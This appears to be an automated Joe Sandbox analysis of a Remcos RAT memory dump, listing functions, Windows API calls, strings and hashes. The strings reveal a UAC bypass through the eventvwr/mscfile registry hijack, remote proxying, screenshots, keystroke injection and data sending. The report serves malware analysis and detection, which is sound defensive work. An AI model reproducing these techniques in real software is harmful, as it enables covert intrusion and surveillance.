                        • Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
                        • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                        Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • SetEvent.KERNEL32(?,?), ref: 0040549F
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                        • TranslateMessage.USER32(?), ref: 0040555E
                        • DispatchMessageA.USER32(?), ref: 00405569
                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                        • String ID: CloseChat$DisplayMessage$GetMessage
                        • API String ID: 2956720200-749203953
                        • Opcode ID: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                        • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                        • Opcode Fuzzy Hash: 38da9913c1d94b4fc4e25114756b75ad617155bf13c772cc5ff9b28bcc7bf55c
                        • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                        Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                        • CloseHandle.KERNEL32(00000000), ref: 00416123
                        • DeleteFileA.KERNEL32(00000000), ref: 00416132
                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                        • String ID: <$@$@%G$@%G$Temp
                        • API String ID: 1704390241-4139030828
                        • Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                        • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                        • Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
                        • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                        Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                        • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                        • Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
                        • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                        Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00445645
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00445651
                        • _free.LIBCMT ref: 0044565C
                        • _free.LIBCMT ref: 00445667
                        • _free.LIBCMT ref: 00445672
                        • _free.LIBCMT ref: 0044567D
                        • _free.LIBCMT ref: 00445688
                        • _free.LIBCMT ref: 00445693
                        • _free.LIBCMT ref: 0044569E
                        • _free.LIBCMT ref: 004456AC
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                        • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                        • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                        • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                        Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00417F6F
                        • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                        • Sleep.KERNEL32(000003E8), ref: 004180B3
                        • GetLocalTime.KERNEL32(?), ref: 004180BB
                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                        • API String ID: 489098229-3790400642
                        • Opcode ID: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                        • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                        • Opcode Fuzzy Hash: 27953ccb73c7935c50ce76e498ac53549bd0f641fbc99231dbf637836dbf8ac1
                        • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                        Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 00409738
                          • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                          • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                          • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                          • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: H"G$H"G
                        • API String ID: 3795512280-1424798214
                        • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                        • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                        • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                        • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                        Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                        • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                        • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                        • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                        Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        • Sleep.KERNEL32(00000064), ref: 00415A46
                        • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                        • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                        • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                        • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                        Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                        • ExitProcess.KERNEL32 ref: 00406782
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteExitProcessShell
                        • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                        • API String ID: 1124553745-1488154373
                        • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                        • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                        • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                        • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                        Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                        • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocConsoleShowWindow
                        • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                        • API String ID: 4118500197-4025029772
                        • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                        • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                        • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                        • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                        Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                          • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                          • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                          • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                        • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                        • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                        • TranslateMessage.USER32(?), ref: 0041B29E
                        • DispatchMessageA.USER32(?), ref: 0041B2A8
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                        • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                        • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                        • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                        Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                        • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                        • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                        • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                        Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                        • __alloca_probe_16.LIBCMT ref: 004510CA
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                        • __alloca_probe_16.LIBCMT ref: 00451174
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                        • __freea.LIBCMT ref: 004511E3
                        • __freea.LIBCMT ref: 004511EF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 201697637-0
                        • Opcode ID: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                        • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                        • Opcode Fuzzy Hash: 3fb5d38a305e3cd885e4cf01d6a6faccac9c0be3147af9b9f82741c0feb9dacf
                        • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                        Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • _memcmp.LIBVCRUNTIME ref: 00442935
                        • _free.LIBCMT ref: 004429A6
                        • _free.LIBCMT ref: 004429BF
                        • _free.LIBCMT ref: 004429F1
                        • _free.LIBCMT ref: 004429FA
                        • _free.LIBCMT ref: 00442A06
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                        • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                        • Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
                        • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                        Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                        • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                        • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                        • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                        Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                        • API String ID: 3578746661-168337528
                        • Opcode ID: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                        • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                        • Opcode Fuzzy Hash: c3d225834e3254adb17b52a5ed13ece1e9c6b305f91900c89a6b7ea0c4643d74
                        • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                        Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                          • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                          • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                        • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                        • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                        • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                        Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                        • __alloca_probe_16.LIBCMT ref: 00447056
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                        • __alloca_probe_16.LIBCMT ref: 0044713B
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                        • __freea.LIBCMT ref: 004471AB
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • __freea.LIBCMT ref: 004471B4
                        • __freea.LIBCMT ref: 004471D9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 3864826663-0
                        • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                        • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                        • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                        • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                        Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InputSend
                        • String ID:
                        • API String ID: 3431551938-0
                        • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
